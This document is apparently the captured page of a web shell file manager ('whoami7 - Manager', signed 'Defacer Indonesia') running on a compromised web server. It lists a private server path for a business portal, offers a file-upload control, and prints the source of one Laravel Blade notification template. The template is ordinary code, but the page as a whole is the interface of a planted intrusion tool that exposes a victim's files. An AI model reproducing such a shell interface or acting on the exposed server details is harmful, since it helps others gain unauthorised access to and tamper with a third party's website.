whoami7 - Manager
:
/
home
/
kckglobal
/
www
/
portal
/
resources
/
views
/
notifications
/
all
/
Upload File:
files >> /home/kckglobal/www/portal/resources/views/notifications/all/shift_change_status.blade.php
@php use App\Models\EmployeeShift;use App\Models\User;use Carbon\Carbon;$notificationUser = User::find($notification->data['user_id']); $shift = EmployeeShift::find($notification->data['new_shift_id']); @endphp @if ($notificationUser && $shift) <x-cards.notification :notification="$notification" :link="route('dashboard')" :image="$notificationUser->image_url" :title="__('email.shiftChangeStatus.subject') . ' - '.Carbon::parse($notification->data['date'])->translatedFormat(company()->date_format)" :text="__('app.'.$notification->data['status']).' - '.__('modules.attendance.shiftName').': '.$shift->shift_name" :time="$notification->created_at"/> @endif
Copyright ©2021 || Defacer Indonesia